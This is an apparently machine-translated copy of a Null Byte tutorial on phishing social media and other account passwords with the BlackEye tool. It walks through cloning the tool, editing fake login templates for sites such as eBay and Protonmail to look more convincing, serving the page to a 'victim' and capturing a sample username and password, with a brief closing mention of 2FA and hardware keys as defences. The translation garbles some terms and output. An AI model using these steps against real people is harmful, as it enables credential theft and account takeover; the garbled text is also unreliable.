قالب وردپرس درنا توس
Home / Tips and Tricks / How Phish for Social Media and Other Account Passwords with BlackEye «Zero Byte :: WonderHowTo

How Phish for Social Media and Other Account Passwords with BlackEye «Zero Byte :: WonderHowTo



Social media accounts are a favorite target for hackers, and the most effective tactics for attacking accounts on sites such as Facebook, Instagram and Twitter are often based on phishing. These password-stealing attacks rely on deceiving users to enter their passwords on a convincingly fake website, and they have become increasingly easy to do thanks to tools like BlackEye.

BlackEye is a tool for quickly generating phishing pages that target social media sites, making it much easier to phish targets of opportunities in the same network. After redirecting a target to the phishing site, it is easy to capture passwords for social media accounts that are harvested from unintentional targets.

BlackEye for Social Media Phishing

Users rely heavily on their social media accounts. If the target does not have 2FA enabled, it may be surprising that an attacker can access them. Simply typing a password on the wrong website can be all it takes to lose access to your account. BlackEye is a concept that demonstrates how these phishing sites do not need to be sophisticated or customized to work effectively.

BlackEye is a simple bash script that presents several templates to choose from, allowing you to choose which social media site to emulate. From there, it creates a functional phishing site on your device with the ability to forward or otherwise connect to your target's machine.

Social Media Supported Sites

BlackEye supports 32 different phishing templates, but these vary in quality. It is best to test them before they are distributed because some suffer from deficiencies that can give them away if a user notices. While the regular phishing pages that come with BlackEye are quite good, they are always useful to change them. This way you can remove things like a copyright notice from the wrong year.

Among the more interesting sites that BlackEye supports are Protonmail, Github, Gitlab, Adobe, Verizon, Twitter, Facebook, Shopify, PayPal and Google. You can test these quickly by following the steps below and clicking on the phishing URL to find out how realistic each template looks before using it.

What You Need

BlackEye is an extremely simple tool but works best on Kali Linux. It depends on the number of dependencies it relies on to run, but these can be installed as needed on Ubuntu or Debian devices. Once you have a Kali distro fully updated, you should be ready to install BlackEye.

Step 1
: Download and test BlackEye

First, we must clone the source from BlackEye's GitHub archive. To do so, open a new terminal window and type the following commands git and cd .

  ~ $ git clone https://github.com/thelinuxchoice/blackeye

Cloning to "blackeye" ...
remote control: List items: 361, done.
remote control: Total 361 (delta 0), reused 0 (delta 0), reused 361
Receiving Items: 100% (361/361), 8.01 MiB | 3.17 MiB / s, clear.
Loose deltas: 100% (101/101), done.

~ $ cd blackeye

~ / blackeye $ 

It should install the BlackEye archive and allow it to run from the blackeye directory with the command bash blackeye.sh . When we run the command we should see the splash screen below.

  ~ / blackeye $ bash blackeye.sh

:: Disclaimer: Developers take no responsibility and are not ::
:: responsible for any abuse or damage caused by BlackEye. ::
:: Use only for educational purposes !! ::

:: Attacking targets without mutual consent is illegal! ::

[01] Instagram [17] IGFollowers [33] Custom BLACKEYE v1.1
[02] Facebook [18] eBay ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒
[03] Snapchat [19] Pinterest ▒▒█▒▒▒▄██████████▄▒▒▒▒
[04] Twitter [20] CryptoCurrency ▒█▐▒▒▒████████████▒▒▒▒
[05] Github [21] Verizon ▒▌▐▒▒██▄▀██████▀▄██▒▒▒
[06] Google [22] DropBox ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒
[07] Spotify [23] Adobe ID ▐┼▐▒▒██████████████▒▒▒
[08] Netflix [24] Shopify ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒
[09] PayPal [25] Messenger ▒▒█████──────────▐███▌
[10] Origin [26] GitLab ▒▒█▀▀██▄█─▄───▐─▄███▀▒
[11] Steam [27] Twitch ▒▒█▒▒███████▄██████▒▒▒
[12] Yahoo [28] MySpace ▒▒▒▒▒██████████████▒▒▒
[13] Linkedin [29] Badoo ▒▒▒▒▒█████████▐▌██▌▒▒▒
[14] Protonmail [30] UK ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒
[15] WordPress [31] Yandex ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒
[16] Microsoft [32] devianART CODED BY: @thelinuxchoice
Upgraded by: @suljot_gjoka 

Step 2: Adjust phishing sites

If we don't like something like an expired copyright notice, we can change it quite easily. First, exit the base script back to the blackeye directory. Then we write ls to see the pages folder in BlackEye repo.

  ~ / blackeye $ ls

blackeye.sh LICENSE README.md Sites 

We can navigate to it with the command cd sites . Then type ls to see all the phishing site templates available to modify.

  ~ / blackeye $ CD sites
~ / blackeye / sites $ ls

Adobe cryptocurrency facebook google linkedin myspace paypal shopify spotify twitter wordpress
badoo devianart github instafollowers messenger netflix pinterest shopping steam verizon yahoo
create dropbox gitlab instagram microsoft origin protonmail snapchat twitch vk yandex 

To edit Protonmail we can write cd protonmail and then ls again to see the files in that folder. You should see something similar to the files below.

  ~ / blackeye / sites $ cd protonmail
~ / blackeye / sites / protonmail $ ls

index_files index.php ip.php ip.txt login.html login.php Saved.ip.txt Saved.usernames.txt 

To edit HTML on the phishing page, you can do so directly by opening the login . html with a text editor, so you can easily update copyright notices or other details.

Step 3: Earn the phishing page

To start our phishing page, open a terminal window and navigate to the blackeye folder again. Then run the command bash blackeye.sh to return to the phishing selection menu. Here we choose eBay, which is number 18.

  ~ / blackeye / sites / protonmail $ cd
~ $ cd blackeye
~ / blackeye $ bash blackeye.sh

[01] Instagram [17] IGFollowers [33] Custom BLACKEYE v1.1
[02] Facebook [18] eBay ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒
[03] Snapchat [19] Pinterest ▒▒█▒▒▒▄██████████▄▒▒▒▒
[04] Twitter [20] CryptoCurrency ▒█▐▒▒▒████████████▒▒▒▒
[05] Github [21] Verizon ▒▌▐▒▒██▄▀██████▀▄██▒▒▒
[06] Google [22] DropBox ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒
[07] Spotify [23] Adobe ID ▐┼▐▒▒██████████████▒▒▒
[08] Netflix [24] Shopify ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒
[09] PayPal [25] Messenger ▒▒█████──────────▐███▌
[10] Origin [26] GitLab ▒▒█▀▀██▄█─▄───▐─▄███▀▒
[11] Steam [27] Twitch ▒▒█▒▒███████▄██████▒▒▒
[12] Yahoo [28] MySpace ▒▒▒▒▒██████████████▒▒▒
[13] Linkedin [29] Badoo ▒▒▒▒▒█████████▐▌██▌▒▒▒
[14] Protonmail [30] UK ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒
[15] WordPress [31] Yandex ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒
[16] Microsoft [32] devianART CODED BY: @thelinuxchoice
Upgraded by: @suljot_gjoka

[*] Select an option: 18 

When you have entered the number of the site you want to create, press enter . We will then be asked to enter our IP address. If you hit enter without adding one, it will try to add yours by default, but it won't always work. Once you enter your IP address, you should see something like the message below.

  [*] Set your local IP (default 10.0.6.27):

[*] Starting php server ...
[*] Send this link to the victim: 192.168.0.16
[*] Waiting victims open the link ... 

Then navigate to the phishing link in a web browser to see the results of your phishing site.

Step 4: Capture a password

When you open the site in a browser, it should look like this:

Open the link to get the script to report on the type of devices currently accessing the phishing page.

  [*] Waiting victims open the link ...

[*] IP Found!
[*] IP Offer: 192.168.43.142
[*] User Agent: User Agent: Mozilla / 5.0 (X11; Linux x86_64; rv: 60.0) Gecko / 20100101 Firefox / 60.0
[*] Saved: shopping / sparad.ip.txt 

Once the target has set their credentials, they are redirected to the real eBay page, creating the illusion of a successful login.

On the hacker's side, BlackEye gives us the references that our target has just set.

  [*] Waiting for data ...

[*] Information found!
[*] Account: fudruckers
[*] Password: thefudruckerking69
[*] Saved: websites / shopping / Saved.usernames.txt 

Just as we have eavesdropped and saved references as a target stated on our phishing page!

Phishing Social Media Sites Is Fast & Easy [19659004] When it comes to stopping attacks like this, two-factor authentication is the average user's best friend. Without it, a single mistake can cause your password to be stolen and used to access your account by an attacker. So set up 2FA on Facebook, Instagram and any other accounts you have.

Another step toward improving security is to use a hardware security key to require new devices to use your key to log in, make stolen passwords and even eavesdropped text messages worthless. Keep in mind that while BlackEye makes phishing easy, it doesn't make it legal to steal passwords for accounts that you do not have permission to access.

I hope you liked this social media password guide! If you have any questions about this tutorial on phishing tools on social media, please ask below, and if you have a comment or idea for a future section, feel free to reach me on Twitter @KodyKinzie .

Don't miss: Stealing Wi-Fi password with an evil twin attack

—–
Learn how to code with Null Byte's beginner's Python course.

Buy now for $ 99.99>

Cover photo and screenshots of Kody / Null Byte




Source link